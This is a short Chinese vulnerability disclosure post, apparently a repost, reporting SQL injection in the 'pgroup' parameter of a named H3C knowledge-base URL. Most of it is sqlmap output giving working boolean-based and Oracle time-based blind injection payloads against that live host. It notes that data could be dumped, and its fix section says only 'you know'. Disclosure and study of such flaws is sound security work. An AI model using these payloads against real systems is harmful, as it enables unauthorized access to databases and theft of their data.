首页 » 漏洞 » 华三通信某分站存在SQL注入漏洞

华三通信某分站存在SQL注入漏洞

 

注入点

code 区域
http://kms.h3c.com/kms/kms/dir/list_allarticle_4_h3c_cn?pgroup=6&kmtype=2

经检测,参数pgroup存在注入

漏洞证明:

code 区域
sqlmap identified the following injection points with a total of 62 HTTP(s) requ

ests:

---

Place: GET

Parameter: pgroup

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: pgroup=6' AND 8578=8578 AND 'KmTJ'='KmTJ&kmtype=2



Type: AND/OR time-based blind

Title: Oracle AND time-based blind

Payload: pgroup=6' AND 1478=DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(71)||CHR

(107)||CHR(81),5) AND 'CqOn'='CqOn&kmtype=2

---

[02:13:48] [INFO] the back-end DBMS is Oracle

web application technology: JSP, Apache 2.2.27

back-end DBMS: Oracle

华三通信某分站存在SQL注入漏洞

可爆出数据,未深入,点到即止。。

修复方案:

你懂的。

原文链接:华三通信某分站存在SQL注入漏洞,转载请注明来源!

0